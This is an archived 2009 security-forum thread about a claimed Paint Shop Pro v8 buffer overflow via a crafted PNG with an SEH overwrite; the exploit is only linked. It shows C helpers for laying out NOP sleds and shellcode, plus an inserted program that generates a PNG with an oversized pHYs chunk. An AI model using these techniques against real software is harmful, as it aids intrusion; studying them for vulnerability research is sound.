Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)
Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 11 posts ] 
 Post subject: Jasc Paint Shop Pro v8 Local Buffer Overflow Exploit (Universal)
PostPosted: 04 Dec 2009 00:40 

Joined: 03 Feb 2009 01:40
Posts: 31
Software: Jasc Paint Shop Pro v8 Local Buffer Overflow Exploit (UNIVERSAL)
Bug type: Local buffer overflow
Exploitation method: SEH handler overwrite
Description:
When a crafted .PNG file is opened a stack buffer overflow occurs.
Because of DEP a SEH handler is overwritten and I overwrote its
address with a POP/POP/RET instruction from the gear12d.dll
module of the software. So the exploit is universal and has the
option to execute multiple shellcodes, 4 at most.
Testing: Tested successfully on Windows XP SP3, compiled with Dev-C++ (.C file).
Author: All credits go to fl0 fl0w.
Video test: http://www.filehost.ro/639385/phtst_rar/
Code: http://cpp.pastebin.com/f30e1300f


 Post subject: Re: Jasc Paint Shop Pro v8 Local Buffer Overflow Exploit (Universal)
PostPosted: 04 Dec 2009 10:38 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
there are 2 things unclear.
the first is that PSP8 doesn't exist or no longer exists, the latest version of JASC/Corel is Paint Shop Pro Photo X2.
is it vulnerable?

then the proof-of-concept is not clear (or not optimized, I don't know how to say it), indeed it's a PNG composed of 3 chunks: IHDR of 13 bytes, tIME of 7 and pHYs of 17417.
but inside the pHYs chunk there are pieces of other chunks/data like PLTE and IDAT, which is completely senseless, so I guess you simply increased the size of pHYs but I don't understand why you left all that garbage there (in these cases the procedure is filling them with NOPs or 'A's or finding the real cause of the vulnerability) or why you didn't write a real proof-of-concept with the PNG file built at runtime.

that reminds me of that thing you released for notepad++ which indeed didn't work, not only because of the PoC which was "speechless" (really I don't know how to define it, brrrrr) but moreover because the bug didn't exist at all :)
so in my opinion you should work a lot on the proof-of-concepts, not on the exploiting part (ret, nop, shellcode and so on) on which you don't seem to have problems, but just on the format and the generation of the testing file.

hope it helps


 Post subject: Re: Jasc Paint Shop Pro v8 Local Buffer Overflow Exploit (Universal)
PostPosted: 04 Dec 2009 14:35 

Joined: 03 Feb 2009 01:40
Posts: 31
Did you see the video? I show how I execute code... clear, what more do you want?
At notepad++ I put some debugging info, STACK OVERFLOW, I don't know what you are talking about regarding the fact that the "bug didn't exist".


Attachments:
testing.png [ 18.04 KiB ]

 Post subject: Re: Jasc Paint Shop Pro v8 Local Buffer Overflow Exploit (Universal)
PostPosted: 04 Dec 2009 16:18 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
I didn't talk about the code execution, I talked about the cleaning of the proof-of-concept and the runtime generation of the png file.
everything from 0x3c (ret+nop+shellcode excluded) is simply garbage, so why did you include it?
and if it's not garbage why didn't you leave only the data necessary for reaching the bugged function?
then where is the bug? is it in the size of the "pHYs" chunk which is too big?

png is a very simple file format (size+chunk+data+crc), that's why it was better (I always talk about the "beauty" of the code) to generate it at runtime and not have it pre-built, otherwise it's completely useless to write a C PoC for a pre-built file :)

oh and then there remains the problem about the version of PSP, check here:
http://en.wikipedia.org/wiki/Corel_Pain ... nt_history
PSP 8 is a jurassic version of over 6 years ago

the notepad++ bug didn't work here and indeed it has not been indexed on the security websites (those which check the vulnerabilities personally).
for example Secunia (which has lots of defects but at least they verify or seem to verify all the bugs they see) doesn't have that "bug" in the database.
maybe it was in a plugin of notepad++ or there was a particular condition that you had on your computer but never exists on the others.
I have also verified the changelog of Notepad++ > 5.4.5 and there is no trace of a fix for a similar bug.
have you checked the changelog or the difference between the bugged and non-bugged source code to see if there were references to the bug you saw?

that's what I meant :)


 Post subject: Re: Jasc Paint Shop Pro v8 Local Buffer Overflow Exploit (Universal)
PostPosted: 04 Dec 2009 17:57 

Joined: 03 Feb 2009 01:40
Posts: 31
Notepad++, I tested it on Vista too and it seemed to be a DoS... pff I don't know, it's possible for some module to have the bug, a module on my computer. Regarding that PSP, man, I'm not as good as you at C so... I didn't make a difference between prebuilt and runtime.


 Post subject: Re: Jasc Paint Shop Pro v8 Local Buffer Overflow Exploit (Universal)
PostPosted: 04 Dec 2009 19:10 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
no problem, it can be a good occasion to practice and learn it.
indeed if you have full power over the building of a file format (or a protocol, which is exactly the same thing in programming) you can find more vulnerabilities, more easily, and moreover knowing perfectly where a bug is located in case of doubts.

the only requirements are:
- documentation of the format reporting all its fields, so the endianness of the numeric fields which can be of 8, 16, 32 or even 64 bits, string fields, data fields (numeric fields which specify the size followed by the data), bitstrings or bit fields, compressions and so on
- the usage of functions which help in this job

the second point is very important because building a file format using structures or memcpy/fwrite for each field is a pain and terribly confusing for both the author and whoever reads the code.
personally I like a lot to use functions that do this job and handle even the endianness, maybe you have noticed them in my PoCs.
the following is a partial list of those for doing operations on a memory buffer with a pointer automatically incremented:
Code:
#include <string.h>

// useful for filling memory with NOPs, 'A's, zeroes and so on
int putcc(unsigned char *data, int chr, int len) {
    memset(data, chr, len);
    return(len);
}

// for copying data from a buffer to the one on which we are working
int putmm(unsigned char *data, const unsigned char *str, int len) {
    memcpy(data, str, len);
    return(len);
}

// for copying a string (without the terminating NUL)
int putss(unsigned char *data, const char *str) {
    int     len;

    len = strlen(str);
    memcpy(data, str, len);
    return(len);
}

// for storing a number of 8, 16 or 32 bits in little endian
int putxx(unsigned char *data, unsigned int num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;
    for(i = 0; i < bytes; i++) {
        data[i] = (num >> (i << 3));    // byte i of the number, lowest byte first
    }
    return(bytes);
}


example (shellcode is any unsigned char array you have defined before):
    int             buff_size;
    unsigned char   *p;
    unsigned char   buff[4000];

    p = buff;
    p += putxx(p, 123,      8);             // 1 byte
    p += putxx(p, 1234,     16);            // 2 bytes, little endian
    p += putxx(p, 12345678, 32);            // 4 bytes, little endian
    p += putss(p, "I'm a string");          // 12 bytes, no NUL
    p += putcc(p, 0x90,     100);           // 100 NOPs
    p += putmm(p, shellcode, sizeof(shellcode));
    buff_size = p - buff;                   // total number of bytes written
I hope it helps or helps someone else interested in these things

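The two points made in this thread (a PNG is just size+chunk+data+crc and should be generated at runtime, and the put-style helpers that advance a pointer by the number of bytes written) combined into one program. This is an added example, not code from the thread or from its author: it builds a test file with the same chunk layout that was discussed (IHDR of 13 bytes, tIME of 7 bytes, an oversized pHYs of 17417 bytes) and then walks the result back to check every length and CRC. Assumptions: `putbe` is a big-endian variant added here because PNG stores lengths, CRCs and numeric fields big-endian (the posted `putxx` is little-endian); the image header values, the timestamp, the filler byte and the output file name are placeholders; the pHYs body is plain 'A' filler, not exploit data; no IDAT is written, so the file is only a container for the oversized chunk, not a displayable image.

```c
/* Added example (not from the thread): build a PNG test file at runtime with
 * put-style helpers, then walk it back to verify every chunk length and CRC.
 * Assumptions: IHDR/tIME values, filler byte and output name are placeholders;
 * the pHYs body is plain filler, not exploit data. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static int putcc(unsigned char *d, int chr, int len) { memset(d, chr, len); return len; }
static int putmm(unsigned char *d, const void *src, int len) { memcpy(d, src, len); return len; }

/* big-endian variant of putxx: PNG lengths, CRCs and numeric fields are big-endian */
static int putbe(unsigned char *d, uint32_t num, int bits) {
    int bytes = bits >> 3;
    for (int i = 0; i < bytes; i++)
        d[i] = (unsigned char)(num >> ((bytes - 1 - i) << 3));
    return bytes;
}

static uint32_t getbe32(const unsigned char *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}

/* CRC-32 as used by PNG (reflected polynomial 0xEDB88320), computed over type + data */
uint32_t png_crc(const unsigned char *buf, size_t len) {
    uint32_t c = 0xffffffffu;
    for (size_t n = 0; n < len; n++) {
        c ^= buf[n];
        for (int k = 0; k < 8; k++)
            c = (c & 1) ? (0xedb88320u ^ (c >> 1)) : (c >> 1);
    }
    return c ^ 0xffffffffu;
}

/* one chunk = length(4, BE) + type(4) + data + crc(4, BE, over type+data) */
static int put_chunk(unsigned char *p, const char *type, const unsigned char *data, uint32_t len) {
    unsigned char *start = p, *crc_from;
    p += putbe(p, len, 32);
    crc_from = p;                               /* CRC does not cover the length field */
    p += putmm(p, type, 4);
    if (len) p += putmm(p, data, (int)len);
    p += putbe(p, png_crc(crc_from, 4 + len), 32);
    return (int)(p - start);
}

static const unsigned char png_sig[8] = { 0x89, 'P', 'N', 'G', 0x0d, 0x0a, 0x1a, 0x0a };

/* Build signature + IHDR(13) + tIME(7) + pHYs(phys_len bytes of `filler`) + IEND.
 * Returns the number of bytes written to out (caller guarantees out is large enough). */
int build_png(unsigned char *out, uint32_t phys_len, int filler) {
    unsigned char ihdr[13], tm[7], *p = out, *q;
    q = ihdr;
    q += putbe(q, 1, 32);                       /* width  (placeholder) */
    q += putbe(q, 1, 32);                       /* height (placeholder) */
    q += putcc(q, 8, 1);                        /* bit depth */
    q += putcc(q, 2, 1);                        /* colour type: RGB */
    q += putcc(q, 0, 3);                        /* compression, filter, interlace */
    q = tm;
    q += putbe(q, 2009, 16);                    /* year (placeholder) */
    q += putcc(q, 12, 1); q += putcc(q, 4, 1);  /* month, day */
    q += putcc(q, 0, 3);                        /* hour, minute, second */
    unsigned char *body = malloc(phys_len ? phys_len : 1);
    putcc(body, filler, (int)phys_len);         /* 'A's instead of leftover garbage */
    p += putmm(p, png_sig, 8);
    p += put_chunk(p, "IHDR", ihdr, 13);
    p += put_chunk(p, "tIME", tm, 7);
    p += put_chunk(p, "pHYs", body, phys_len);  /* oversized on purpose, as in the PoC */
    p += put_chunk(p, "IEND", NULL, 0);
    free(body);
    return (int)(p - out);
}

/* Walk the chunks checking bounds and CRCs; returns the chunk count, or -1 if the
 * signature is wrong, a declared length overruns the file, or a CRC mismatches. */
int check_png(const unsigned char *buf, int size) {
    if (size < 8 || memcmp(buf, png_sig, 8) != 0) return -1;
    int off = 8, count = 0;
    while (off + 12 <= size) {
        uint32_t len = getbe32(buf + off);
        if ((uint64_t)off + 12 + len > (uint64_t)size) return -1;
        if (png_crc(buf + off + 4, 4 + len) != getbe32(buf + off + 8 + len)) return -1;
        off += 12 + (int)len;
        count++;
    }
    return off == size ? count : -1;
}

int main(void) {
    static unsigned char buf[65536];
    int n = build_png(buf, 17417, 'A');
    FILE *f = fopen("testing.png", "wb");       /* output name is a placeholder */
    if (!f) { perror("fopen"); return 1; }
    fwrite(buf, 1, n, f);
    fclose(f);
    printf("wrote %d bytes, chunk walk returned %d\n", n, check_png(buf, n));
    return 0;
}
```

The chunk size and filler are the only knobs: changing `phys_len` or moving the filler to another chunk only touches one line, which is the practical reason for generating the file at runtime rather than shipping a pre-built blob. `check_png` is the same bounds-and-CRC walk a careful parser would do, so a generated file that fails it would be rejected before the oversized chunk ever reaches the code under test.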

 Post subject: Re: Jasc Paint Shop Pro v8 Local Buffer Overflow Exploit (Universal)
PostPosted: 04 Dec 2009 19:45 

Joined: 03 Feb 2009 01:40
Posts: 31
Good point, the functions you use are important, otherwise you get really confused in the process of making the file. I see the code is really good thinking, thanks. Btw is there any way we could chat somewhere else? I have a lot of bugs, or I just keep trying stuff and I get errors, crashes, sometimes exploitable; anyway I experiment a lot with things that I don't fully understand, and I'm just analyzing other codes for hours at a time. Your code, just now after some time, I'm starting to understand some things but I'd say 40%-50%. I won't bug you or stuff like that, just talk you know... I'd like to become as skilled some day, and it needs work.


 Post subject: Re: Jasc Paint Shop Pro v8 Local Buffer Overflow Exploit (Universal)
PostPosted: 05 Dec 2009 00:14 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
you can find my msn contact in the profile, it's the only type of chat I use, although rarely.
and yeah, this hobby requires time and effort, but sometimes it's worth what we spend on it :)
it introduces new things which oblige us to learn something new, and then we see that what we learnt can be used also to do other things, maybe completely different, and we learn new stuff again, just like a chain.


 Post subject: Re: Jasc Paint Shop Pro v8 Local Buffer Overflow Exploit (Universal)
PostPosted: 05 Dec 2009 00:42 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
oh, and in case you want to test the latest PSP, which is PSP12 aka "Paint Shop Pro Photo X2", the following is the official link of the trial:
http://www.corel.com/akdlm/6763/downloads/trials/PaintShopProX2/Ultimate/PSPP12_Corel_TBYB_EN_IE_FR_DE_ES_IT_NL_ESD.exe
I don't know if it's still vulnerable because I have not tested it, but there are good chances it's still bugged after 6 years


 Post subject: Re: Jasc Paint Shop Pro v8 Local Buffer Overflow Exploit (Universal)
PostPosted: 05 Dec 2009 19:23 

Joined: 03 Feb 2009 01:40
Posts: 31
Btw your functions return an integer, so how can you add it to a char parameter?


 Post subject: Re: Jasc Paint Shop Pro v8 Local Buffer Overflow Exploit (Universal)
PostPosted: 05 Dec 2009 19:57 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
because it's a char pointer so I increment its current position with the integer returned by the functions.
so if my p pointer points to the memory address 0x00401000, when I do "p += putxx(p, 0x11223344, 32);" I will add 4 to it (because a 32bit number occupies 4 bytes) and so it will point to 0x00401004.

if instead of being a char pointer it was an int pointer it would be incremented by 16 bytes, 4 (size of an int) * 4 (number returned by the function), but that's another story

